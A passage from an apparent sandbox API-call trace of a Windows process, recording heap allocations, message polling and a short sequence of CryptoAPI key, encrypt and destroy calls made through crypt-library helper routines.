lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0187.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0187.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0187.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0187.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0187.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0187.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0187.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0187.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0187.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0187.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0187.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0187.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0187.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0187.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0187.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0187.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0187.335] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0187.335] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0187.335] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.336] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.336] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.336] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.336] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.336] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.336] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.336] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.336] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0187.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.336] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.336] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0187.336] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.336] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.336] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.336] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.337] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.337] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.337] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.337] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.337] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.337] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.337] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.337] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0187.337] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.337] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.337] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x2435, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x2440) returned 1 [0187.337] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.338] CharLowerBuffW (in: lpsz="byte[9281]", cchLength=0xa | out: lpsz="byte[9281]") returned 0xa [0187.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.338] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.338] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.338] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.338] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbec458*, pdwDataLen=0x87e820*=0x2435, dwBufLen=0x2440 | out: pbData=0xbec458*, pdwDataLen=0x87e820*=0x2440) returned 1 [0187.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.339] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0187.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.339] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.339] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.339] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.339] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.339] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.339] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.339] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.339] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.339] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.340] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.340] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.340] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.340] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.342] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.342] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.342] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0187.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.342] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.342] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.342] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0187.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.342] CryptDestroyKey (hKey=0x90aed8) returned 1 [0187.342] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.342] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.349] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0187.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.349] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.349] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.349] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0187.349] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0187.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0187.349] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.349] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.349] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0187.350] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0187.350] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0187.350] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.350] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.350] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.350] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0187.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 